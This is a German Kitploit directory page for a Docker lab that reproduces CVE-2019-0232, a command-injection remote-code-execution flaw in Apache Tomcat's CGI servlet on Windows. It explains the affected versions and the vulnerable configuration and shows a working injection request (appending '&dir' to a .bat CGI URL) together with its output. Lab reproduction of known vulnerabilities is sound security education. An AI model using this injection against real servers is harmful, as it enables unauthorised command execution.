Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Preproduce-CVE-2019-0232 — Docker-basierte Laborumgebung zur Reproduktion von CVE-2019-0232, einer Remote-Code-Ausführung-Sicherheitslücke im Apache Tomcat CGI Servlet unter Windows, mit Ausbeutungsbeispielen. | Kitploit
Tools/GitHubGitHub/luongchivi/preproduce-cve-2019-0232
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubluongchivi/preproduce-cve-2019-0232

Preproduce-CVE-2019-0232

Docker-basierte Laborumgebung zur Reproduktion von CVE-2019-0232, einer Remote-Code-Ausführung-Sicherheitslücke im Apache Tomcat CGI Servlet unter Windows, mit Ausbeutungsbeispielen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 MonatNoch nicht geprüft

CVE-2019-0232 - Apache Tomcat CGI Servlet Remote Code Execution

Dieses Repository stellt eine Docker-basierte Laborumgebung zur Reproduktion der CVE-2019-0232-Sicherheitslücke in Apache Tomcat 9.0.17 unter Windows bereit.

Überblick über die Sicherheitslücke

CVE-2019-0232 ist eine Sicherheitslücke zur Remote-Codeausführung im Apache Tomcat CGI Servlet unter Windows. Das Problem entsteht durch eine unsachgemäße Behandlung von Kommandozeilenargumenten, wenn der Parameter enableCmdLineArguments auf true gesetzt ist. Ein Angreifer kann über die Abfragezeichenfolge beliebige Argumente an das CGI-Skript übergeben, was zur Ausführung von Systembefehlen führt.

  • Betroffene Versionen: Apache Tomcat 9.0.0.M1 bis 9.0.17
  • Behobene Versionen: 9.0.18 und höher
  • Erforderliche Bedingungen:
    • Windows-Betriebssystem
    • enableCmdLineArguments=true in der CGI-Servlet-Konfiguration
    • CGI-Servlet aktiviert und auf ein URL-Muster abgebildet

Laborumgebung

Verzeichnisstruktur

root@kitploit:~
tomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
	├── apache-tomcat-9.0.17-windows-x64.zip
    └── apache-tomcat-9.0.17
        ├── conf
        │   └── context.xml              ← (privileged="true")
        └── webapps
            └── ROOT
                └── WEB-INF
                    ├── web.xml           ← (CGI-Konfiguration)
                    └── cgi-bin
                        └── test.bat      ← (.bat-Skript)

Konfigurationsdateien

  • context.xml: Setzt privileged="true", um der Webanwendung die Nutzung des CGI-Servlets zu erlauben.
  • web.xml: Definiert das CGI-Servlet mit enableCmdLineArguments=true und ordnet es /cgi-bin/* zu.
  • test.bat: Ein einfaches Batch-Skript, das eine Willkommensnachricht zurückgibt.

Erste Schritte

Voraussetzungen

  • Docker (Windows-Container-Modus)
  • Docker Compose

Bauen und Ausführen

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

Ausnutzung

root@kitploit:~
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"

Welcome to CGI Test Page
 Volume in drive C has no label.
 Volume Serial Number is 3E70-7C38

 Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin

07/12/2026  11:45 AM    <DIR>          .
07/12/2026  11:45 AM    <DIR>          ..
07/12/2026  12:25 PM                78 test.bat
               1 File(s)             78 bytes
               2 Dir(s)  136,027,971,584 bytes free
Tool herunterladen